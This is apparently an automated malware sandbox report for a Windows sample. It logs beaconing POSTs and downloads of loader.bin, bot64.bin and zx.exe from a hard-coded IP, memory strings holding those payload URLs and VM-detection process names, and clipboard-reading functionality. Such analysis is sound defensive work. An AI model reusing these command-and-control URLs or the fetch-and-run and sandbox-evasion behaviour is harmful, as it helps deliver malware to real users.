Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4

Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Contains functionality for read data from the clipboard

Source: global traffic	HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3

Source: unknown

Source: explorer.exe	String found in binary or memory: http://176.111.174.140/api/bot.bin
Source: explorer.exe, 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2978916132.000000000B4D0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot.binchrome.exehttp://176.111.174.140/api/bot.bintrusteerchrome.exeoper
Source: explorer.exe, explorer.exe, 00000002.00000002.2981928072.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot64.bin
Source: explorer.exe, 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2978916132.000000000B4D0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot64.binhttp://176.111.174.140/api/bot64.binCreateProcessInternalWKernel
Source: fNzx1wx8tL.exe, 00000000.00000002.1711392974.0000015FFE2BF000.00000004.00000020.00020000.00000000.sdmp, fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/l
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: fNzx1wx8tL.exe	String found in binary or memory: http://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeC
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micH
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: python38.dll.8.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: explorer.exe, 00000002.00000002.2972507540.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2976082883.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2971758308.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
